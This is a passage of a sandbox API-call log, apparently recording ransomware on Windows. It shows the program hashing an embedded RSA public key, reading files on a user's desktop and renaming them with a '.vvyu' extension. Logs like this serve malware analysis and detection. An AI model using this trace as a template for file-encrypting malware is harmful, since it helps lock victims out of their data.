Size=0x14) returned 0x2a26b08 [0188.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.222] GetCurrentThreadId () returned 0x5d8 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee1d0 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.222] GetCurrentThreadId () returned 0x5d8 [0188.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d880 [0188.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d928 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d940 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8e0 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d868 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae3ea0 [0188.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae40b0 [0188.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae42c8 [0188.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae40b0 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42c8 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1fd8 | out: hHeap=0x2c0000) returned 1 [0188.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.234] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x13f73, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x13f73, lpOverlapped=0x0) returned 1 [0188.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.235] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13f78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.235] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.237] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.237] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.238] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.238] CloseHandle (hObject=0x584) returned 1 [0188.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2ae3ea0 [0188.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.240] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\djRHD.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\djrhd.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\djRHD.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\djrhd.jpg.vvyu")) returned 1 [0188.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.244] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.247] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaecd420, ftCreationTime.dwHighDateTime=0x1d89986, ftLastAccessTime.dwLowDateTime=0xf21589a0, ftLastAccessTime.dwHighDateTime=0x1d89efa, ftLastWriteTime.dwLowDateTime=0xf21589a0, ftLastWriteTime.dwHighDateTime=0x1d89efa, nFileSizeHigh=0x0, nFileSizeLow=0x1a22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E 8rOnJ1a8nkX -7zzxk.wav", cAlternateFileName="E8RONJ~1.WAV")) returned 1 [0188.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1fd8 [0188.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0188.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1fd8 | out: hHeap=0x2c0000) returned 1 [0188.248] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\E 8rOnJ1a8nkX -7zzxk.wav") returned=".wav" [0188.248] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\E 8rOnJ1a8nkX -7zzxk.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\e 8ronj1a8nkx -7zzxk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.248] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=6690) returned 1 [0188.248] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.252] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x19fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.252] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.255] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.255] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1a22, lpOverlapped=0x0) returned 1 [0188.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.256] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.257] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.257] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.257] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.257] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.257] GetLastError () returned 0x0 [0188.257] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.258] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.258] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.258] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.258] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a20) returned 0x2ae3ea0 [0188.258] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1fd8 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 